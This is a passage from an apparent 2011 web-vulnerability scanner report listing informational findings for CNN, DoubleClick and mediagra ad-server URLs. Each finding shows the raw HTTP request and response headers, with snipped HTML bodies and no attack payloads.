Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrSyMDG0BvOT80pAfCPrWgA%3D; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 740
Date: Mon, 15 Aug 2011 19:05:49 GMT
X-Varnish: 1909287838
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascrip
...[SNIP]...

18.2. http://a5.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a5.mediagra.com
Path:   /b.php

Request

GET /b.php?s=13 HTTP/1.1
Host: a5.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.2
Date: Mon, 15 Aug 2011 18:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrQyMjS2BvOT80rAfOtaAA%3D%3D; path=/
Content-Length: 838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascrip
...[SNIP]...

18.3. http://ad.doubleclick.net/adi/amzn.us.house.redirect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/amzn.us.house.redirect/

Request

GET /adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbtYQ9ait5Dn-YTEFyZnCYtfUfXf9zFfSEFBpO03suLL9pqQrZ.yPdj7Vob1aS6PK7Rz5sf0iu3Qrn4mv2.cpSP7BomB8.h08ZhdCEsUwfYSc96kHdEjUXzR1tVBiwV1v4xdxmYQQkw8r8z0lh-uT1kJQV0aRH9qsW2jEF17Dev9Ywuhsc.h0a7FWcsNTtsxKJ6JifJjW2zg3jpTc9fDaHDpzVElI51j-BRyXBFXF2RayGvWR0e8O1yqI5oa9NvPbS-9CplZHeUV1cXCv0lqVKT1sPyXU5tiwJtw0GXQtdQVHKBae4OFtZ2oITbUYAl3wNrulDLb2LC5.FmjL4dBOfZe9xl8H3Y7e-DR5uQ0FCTupDmD2IQCgxZs4E-pKqkXGMOGATFnu5gpufNXilJXNDzTuXcAQjDEq-tdWU7CpQti0E7AOVccWwMf1V0GY891kDHcdd7pJLtl9aw0_&d=;ord=4,525,044,809,135,282,754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/a/ifb/pda_comm2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2154
Date: Mon, 15 Aug 2011 18:26:17 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 15103 Template Name = !IMDb - Simple 3rd Pa
...[SNIP]...

18.4. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525

Request

GET /html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:00 GMT
Server: Apache
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:00 GMT
Pragma: no-cache
Content-Length: 3151
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.5. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492

Request

GET /html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:13 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:13 GMT
Pragma: no-cache
Content-Length: 1054
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=730,2247,2743,2823,3285,9496,9779,9781,9853,10381,16113,17251,18517,18982,19419,19974,30544,30550,32594,3
...[SNIP]...

18.6. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:06 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:06 GMT
Pragma: no-cache
Content-Length: 3439
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.7. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph¶ms.styles=fs&domId=177939&page.allowcompete=yes&domId=177939  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:40 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:40 GMT
Pragma: no-cache
Content-Length: 3376
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.8. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 3446
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.9. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:38 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:38 GMT
Pragma: no-cache
Content-Length: 3457
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.10. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:14 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:14 GMT
Pragma: no-cache
Content-Length: 2766
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.11. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:09 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:09 GMT
Pragma: no-cache
Content-Length: 2715
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.12. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
